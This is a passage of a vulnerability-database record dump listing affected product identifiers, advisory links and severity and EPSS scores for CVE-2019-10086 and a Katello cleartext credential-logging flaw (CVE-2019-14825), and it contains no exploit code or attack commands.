url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*
157
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2.5.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2.5.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2.5.3:*:*:*:*:*:*:*
158
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*
159
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*
160
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.56:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.56:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.56:*:*:*:*:*:*:*
161
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.57:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.57:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.57:*:*:*:*:*:*:*
162
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.58:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.58:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:peoplesoft_enterprise_pt_peopletools:8.58:*:*:*:*:*:*:*
163
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*
164
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:real-time_decisions_solutions:3.2.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:real-time_decisions_solutions:3.2.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:real-time_decisions_solutions:3.2.0.0:*:*:*:*:*:*:*
165
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_advanced_inventory_planning:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_advanced_inventory_planning:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_advanced_inventory_planning:14.1:*:*:*:*:*:*:*
166
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*
167
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*
168
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_invoice_matching:16.0.3:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_invoice_matching:16.0.3:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_invoice_matching:16.0.3:*:*:*:*:*:*:*
169
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_merchandising_system:5.0.3.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_merchandising_system:5.0.3.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_merchandising_system:5.0.3.1:*:*:*:*:*:*:*
170
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*
171
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_predictive_application_server:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_predictive_application_server:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_predictive_application_server:16.0:*:*:*:*:*:*:*
172
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_price_management:14.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_price_management:14.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_price_management:14.0:*:*:*:*:*:*:*
173
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_price_management:14.0.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_price_management:14.0.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_price_management:14.0.1:*:*:*:*:*:*:*
174
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_price_management:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_price_management:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_price_management:15.0:*:*:*:*:*:*:*
175
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_price_management:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_price_management:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_price_management:16.0:*:*:*:*:*:*:*
176
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*
177
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*
178
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*
179
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*
180
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*
181
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*
182
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:*
183
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*
184
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:service_bus:12.2.1.4.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:service_bus:12.2.1.4.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:service_bus:12.2.1.4.0:*:*:*:*:*:*:*
185
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:solaris_cluster:4.4:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:solaris_cluster:4.4:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:solaris_cluster:4.4:*:*:*:*:*:*:*
186
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:time_and_labor:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:time_and_labor:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:time_and_labor:*:*:*:*:*:*:*:*
187
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:*
188
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.2.0.2.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:utilities_framework:4.2.0.2.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.2.0.2.0:*:*:*:*:*:*:*
189
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.2.0.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:utilities_framework:4.2.0.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.2.0.3.0:*:*:*:*:*:*:*
190
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*
191
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*
192
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*
193
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
194
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2.0:*:*:*:*:*:*:*
reference_id cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2.0:*:*:*:*:*:*:*
195
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*
196
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*
197
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
reference_id cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*
198
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*
199
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
reference_id cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*
200
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*
201
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_eus:7.7:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux_eus:7.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_eus:7.7:*:*:*:*:*:*:*
202
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*
203
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*
204
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server:8.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux_server:8.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server:8.0:*:*:*:*:*:*:*
205
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*
206
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*
207
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*
reference_id cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*
208
reference_url https://github.com/advisories/GHSA-6phf-73q6-gh87
reference_id GHSA-6phf-73q6-gh87
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6phf-73q6-gh87
209
reference_url https://security.gentoo.org/glsa/202405-21
reference_id GLSA-202405-21
reference_type
scores
url https://security.gentoo.org/glsa/202405-21
210
reference_url https://access.redhat.com/errata/RHSA-2020:0899
reference_id RHSA-2020:0899
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:0899
211
reference_url https://access.redhat.com/errata/RHSA-2020:0951
reference_id RHSA-2020:0951
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:0951
212
reference_url https://access.redhat.com/errata/RHSA-2020:1308
reference_id RHSA-2020:1308
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1308
213
reference_url https://access.redhat.com/errata/RHSA-2020:1454
reference_id RHSA-2020:1454
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1454
214
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
215
reference_url https://access.redhat.com/errata/RHSA-2020:2321
reference_id RHSA-2020:2321
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2321
216
reference_url https://access.redhat.com/errata/RHSA-2020:2333
reference_id RHSA-2020:2333
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2333
217
reference_url https://access.redhat.com/errata/RHSA-2020:2619
reference_id RHSA-2020:2619
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2619
218
reference_url https://access.redhat.com/errata/RHSA-2020:2740
reference_id RHSA-2020:2740
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2740
219
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
220
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
221
reference_url https://access.redhat.com/errata/RHSA-2020:3587
reference_id RHSA-2020:3587
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3587
222
reference_url https://access.redhat.com/errata/RHSA-2024:5856
reference_id RHSA-2024:5856
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:5856
223
reference_url https://access.redhat.com/errata/RHSA-2025:9318
reference_id RHSA-2025:9318
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:9318
224
reference_url https://usn.ubuntu.com/USN-4766-1/
reference_id USN-USN-4766-1
reference_type
scores
url https://usn.ubuntu.com/USN-4766-1/
fixed_packages
aliases CVE-2019-10086, GHSA-6phf-73q6-gh87
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bhq3-j6aj-1yae
30
url VCID-bsbd-bsbq-7qdk
vulnerability_id VCID-bsbd-bsbq-7qdk
summary 
Katello cleartext password storage issue
A cleartext password storage issue was discovered in Katello, versions 3.x.x.x before katello 3.12.2. Registry credentials used during container image discovery were inadvertently logged without being masked. This flaw could expose the registry credentials to other privileged users.
references
0
reference_url https://access.redhat.com/errata/RHSA-2019:3172
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3172
1
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14825.json
reference_id
reference_type
scores
0
value 4.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-14825.json
2
reference_url https://access.redhat.com/security/cve/CVE-2019-14825
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2019-14825
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2019-14825
reference_id
reference_type
scores
0
value 0.00152
scoring_system epss
scoring_elements 0.35956
published_at 2026-04-08T12:55:00Z
1
value 0.00152
scoring_system epss
scoring_elements 0.35906
published_at 2026-04-07T12:55:00Z
2
value 0.00152
scoring_system epss
scoring_elements 0.36073
published_at 2026-04-04T12:55:00Z
3
value 0.00152
scoring_system epss
scoring_elements 0.36042
published_at 2026-04-02T12:55:00Z
4
value 0.00152
scoring_system epss
scoring_elements 0.35947
published_at 2026-04-12T12:55:00Z
5
value 0.00152
scoring_system epss
scoring_elements 0.35922
published_at 2026-04-13T12:55:00Z
6
value 0.00152
scoring_system epss
scoring_elements 0.35986
published_at 2026-04-11T12:55:00Z
7
value 0.00152
scoring_system epss
scoring_elements 0.35979
published_at 2026-04-09T12:55:00Z
8
value 0.00152
scoring_system epss
scoring_elements 0.35851
published_at 2026-04-01T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2019-14825
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1730668
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=1730668
5
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1739485
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=1739485
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14825
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3
scoring_elements
1
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
2
value LOW
